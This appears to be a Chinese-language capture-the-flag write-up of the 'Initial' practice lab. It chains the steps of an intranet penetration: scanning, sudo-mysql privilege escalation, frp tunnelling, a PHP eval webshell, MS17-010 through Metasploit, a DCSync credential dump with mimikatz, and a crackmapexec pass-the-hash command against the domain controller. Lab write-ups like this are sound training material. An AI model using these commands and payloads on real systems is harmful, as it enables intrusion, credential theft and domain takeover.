春秋云镜渗透靶场Initial

春秋云镜渗透靶场Initial
J1Zh0n9靶标介绍:
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
知识点呈现:DCSync CVE 域渗透
详细讲解:
flag1
根据题目给出地直接fscan扫描
然后根据框架信息直接利用现成工具rce
蚁剑连接
尝试寻找flag但是直接find查不到任何信息, 尝试suid提权
1 | find / -perm -u=s -type f 2>/dev/null |
发现没有能用的
在尝试suid提权无果后,使用sudo提权方式
1 | sudo -l |
可以看到 mysql 是配置了 sudo 免密使用的,可以使用 mysql 命令暂时获取 root 权限,想要执行其他命令,可以使用 mysql -e 模式
1 | sudo mysql -e '\! find / -name flag*' |
1 | sudo mysql -e '\! cat /root/flag/flag01.txt' |
1 | flag01: flag{60b53231- |
尝试收集内网信息 传入fscan用于扫描以及frp用于代理
fscan
1 | (icmp) Target 172.22.1.2 is alive 域控 |
frp版本是0.51(高版本语法不对)
frpc.ini
启动语法
1 | ./frpc -c frpc.ini |
1 | [common] |
frps.ini
1 | ./frps -c frps.ini |
1 | [common] |
尝试内网穿透, 本地用proxifier进行代理
然后就可以在本机访问内网了
flag2
登录校验直接弱密码绕过
1 | admin |
根据框架版本V2.2.8
收集漏洞信息发现exp
1 | import requests |
同目录准备一个1.php
1 | eval($_POST[1]); |
直接执行即可
我们antsword直接连接即可
1 | dir C:\flag* /s |
查到flag
1 | flag02: 2ce3-4813-87d4- |
flag3
172.22.1.21存在ms17-010
我们直接尝试使用kali的msf进行攻击
kali自带了一个 proxychains4 工具,我们只需要编辑 etc 目录下的 proxychains4.conf 文件:
1 | vim /etc/proxychains4.conf |
配置上刚刚服务器的代理连接然后开启msf
1 | proxychains4 msfconsole |
运行成功会出现meterpreter>
该 Meterpreter 是 metasploit 的一个扩展模块,可以调用 metasploit 的一些功能,对目标系统进行更深入的渗透,入获取屏幕、上传/下载文件、创建持久后门等。
下面介绍一些该模块常用的命令:
1 | meterpreter > screenshot # 捕获屏幕 |
紧接着上图,可以发现我们已经成功的打进该主机,遗憾的是该机子上并没有 flag ,也就是说我们最后的flag 在 windows DC 域控制器上面
接下来是进行 DCSync 攻击,这里简单解释一下:
首先,什么是 DCSync
1 | 在域中,不同的域控之间,默认每隔15min就会进行一次域数据同步。当一个额外的域控想从其他域控同步数据时,额外域控会像其他域控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像域控发起数据同步请求,以获得指定域控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。分别是drsuapi和dsaop。 |
也就是说我们可以通过 DCSync 来导出所有用户的 hash 然后进行哈希传递攻击,要想使用 DCSync 必须获得以下任一用户的权限:
1 | Administrators 组内的用户 |
现在我们回到一开始 fscan 的扫描结果:
发现这个机子就是enterprise用户,也就是说满足DCSync攻击的条件,于是我们在msf中依次输入以下命令来获取用户的hash
1 | load kiwi # 调用mimikatz模块 |
这里我们比较关注是 Administrator 用户的 hash,接下来我们使用 crackmapexec 来进行哈希传递攻击,来实现 DC域控 上的任意命令执行,通过以下命令来获取 flag3
1 | crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" |
获得flag3
1 | flag03: e8f88d0d43d6} |
























